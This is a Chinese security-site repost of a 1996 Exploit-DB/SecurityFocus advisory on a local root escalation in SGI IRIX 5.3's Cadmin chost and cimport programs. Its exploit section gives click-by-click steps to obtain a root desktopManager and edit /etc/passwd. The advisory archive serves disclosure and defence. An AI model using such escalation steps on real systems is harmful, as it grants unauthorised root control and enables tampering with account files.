SGI IRIX 5.3 - 'Cadmin' Local Privilege Escalation

admin 2021年4月8日17:59:22SGI IRIX 5.3 - 'Cadmin' Local Privilege Escalation已关闭评论24 views字数 897阅读2分59秒阅读模式

SGI IRIX 5.3 - 'Cadmin' Local Privilege Escalation

漏洞ID 1053342 漏洞类型
发布时间 1996-08-06 更新时间 1996-08-06
SGI IRIX 5.3 - 'Cadmin' Local Privilege Escalation CVE编号 N/A
SGI IRIX 5.3 - 'Cadmin' Local Privilege Escalation CNNVD-ID N/A
漏洞平台 IRIX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19268
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/335/info

A vulnerability exists in the chost and cimport programs, as shipped with SGI's Irix 5.x operating system. chost is part of the Cadmin package. By failing to validate the real userid, these programs allow any user to edit protected files, such as the passwd file.

/usr/Cadmin/bin/chost
tools-primary user information
change information
OK (to root password, ie leave blank)
OK (to "password invalid")
Cancel
Double-click any share resource to bring up desktopManager
running as root. Try editing /etc/passwd


/usr/Cadmin/bin/cimport
New
OK
OK
Cancel
double-click any of the mounted filesystems to bring up the desktopManager

相关推荐: wall daemon漏洞

wall daemon漏洞 漏洞ID 1207706 漏洞类型 未知 发布时间 1994-01-01 更新时间 1994-01-01 CVE编号 CVE-1999-0181 CNNVD-ID CNNVD-199401-001 漏洞平台 N/A CVSS评分 6…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月8日17:59:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SGI IRIX 5.3 - 'Cadmin' Local Privilege Escalationhttps://cn-sec.com/archives/329811.html